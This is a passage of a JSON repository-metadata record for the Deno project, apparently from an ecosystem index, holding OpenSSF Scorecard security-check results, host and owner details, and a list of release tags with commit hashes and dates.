'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name"